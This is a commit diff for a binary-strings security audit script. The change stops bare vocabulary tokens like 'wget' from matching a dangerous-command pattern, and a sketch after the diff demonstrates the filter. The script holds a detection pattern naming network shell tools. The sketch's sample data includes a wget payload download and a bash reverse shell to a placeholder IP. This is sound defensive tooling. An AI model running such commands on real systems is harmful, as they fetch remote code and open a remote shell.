Commit 3f7f7ee

Fix binary string audit: exclude bare token vocabulary matches
The embedded Nomic code token vocabulary (40K tokens) includes words like "wget" as code tokens. Filter out bare single-word matches (2-10 lowercase chars) since real dangerous strings appear in command context, not as standalone vocabulary entries.
1 parent 74099d8 commit 3f7f7ee

1 file changed

+4
-1
lines changed

scripts/security-strings.sh

Lines changed: 4 additions & 1 deletion
@@ -97,7 +97,10 @@ echo ""
 echo "--- Dangerous command detection ---"
 
 DANGEROUS_CMDS='wget|netcat|ncat|/dev/tcp|telnet'
-if grep -wE "$DANGEROUS_CMDS" "$STRINGS_FILE" > "$SEC_CMDS" 2>/dev/null; then
+# Filter out bare single-word matches from the embedded token vocabulary
+# (vendored/nomic/code_tokens.h contains 40K code tokens including "wget").
+# Real dangerous strings would appear in a command context, not as standalone words.
+if grep -wE "$DANGEROUS_CMDS" "$STRINGS_FILE" | grep -vxE '[a-z]{2,10}' > "$SEC_CMDS" 2>/dev/null && [ -s "$SEC_CMDS" ]; then
 echo "BLOCKED: Dangerous commands found in binary:"
 cat "$SEC_CMDS"
 FAIL=1
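
To see what the new two-stage filter keeps and drops, here is a minimal sketch that runs the same pipeline on a small hand-written sample. The sample lines, the temporary files, and the `filter_dangerous` helper are illustrative assumptions and are not part of scripts/security-strings.sh; only the `DANGEROUS_CMDS` pattern and the two `grep` invocations are taken from the diff.

```shell
#!/bin/sh
# Hypothetical sample standing in for the `strings` output of the binary.
STRINGS_FILE=$(mktemp)
trap 'rm -f "$STRINGS_FILE"' EXIT

cat > "$STRINGS_FILE" <<'EOF'
wget
telnet
wget http://example.invalid/payload.sh
printf
bash -i >& /dev/tcp/10.0.0.1/4444
EOF

# Same pattern as in the commit.
DANGEROUS_CMDS='wget|netcat|ncat|/dev/tcp|telnet'

# Illustrative helper (not in the original script):
#   stage 1 keeps lines containing a dangerous command as a whole word;
#   stage 2 drops lines that consist only of 2-10 lowercase letters,
#   i.e. bare vocabulary entries such as "wget" or "telnet".
filter_dangerous() {
    grep -wE "$DANGEROUS_CMDS" "$1" | grep -vxE '[a-z]{2,10}'
}

filter_dangerous "$STRINGS_FILE"
```

On this sample, only the `wget http://...` line and the `/dev/tcp` line survive; the bare `wget` and `telnet` entries are filtered out. One consequence worth keeping in mind: a bare `netcat` or `ncat` on a line by itself would also be dropped, which is the trade-off the commit message accepts.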